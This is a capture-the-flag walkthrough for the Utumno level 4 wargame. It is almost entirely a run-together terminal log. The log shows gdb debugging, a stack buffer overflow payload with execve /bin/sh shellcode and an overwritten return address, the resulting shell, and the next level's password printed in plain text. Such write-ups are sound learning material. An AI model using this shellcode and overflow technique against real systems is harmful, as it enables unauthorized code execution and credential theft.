utumno - 4

root@today:~/Desktop/misc/utumno/utumno4# ssh utumno4@178.79.134.250utumno4@melinda:~$ cd /tmp/utu4utumno4@melinda:/tmp/utu4$ gdb -tui /utumno/utumno4(gdb) layout asm(gdb) b *main+108Breakpoint 1 at 0x80484c9: file utumno4.c, line 36.(gdb) run 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xff\xff\xff\xff" + "U" * 238'`Starting program: /games/utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xff\xff\xff\xff" + "U" * 238'`Breakpoint 1, main (argc=1431655765, argv=0x55555555) at utumno4.c:36(gdb) x/8dbx $esp+0x1e0xfffdd6ce:     0x6a    0x0b    0x58    0x31    0xf6    0x56    0x68    0x2f

#so we get the buffer address is 0xfffdd6de or 0xfffdd6be

utumno4@melinda:/tmp/utu4$ /utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xce\xd6\xfd\xff" + "U" * 238'`Segmentation faultutumno4@melinda:/tmp/utu4$ /utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xbe\xd6\xfd\xff" + "U" * 238'` Illegal instructionutumno4@melinda:/tmp/utu4$ /utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xde\xd6\xfd\xff" + "U" * 238'` $ whoamiutumno5$ cat /etc/utumno_pass/utumno5           woucaejiek$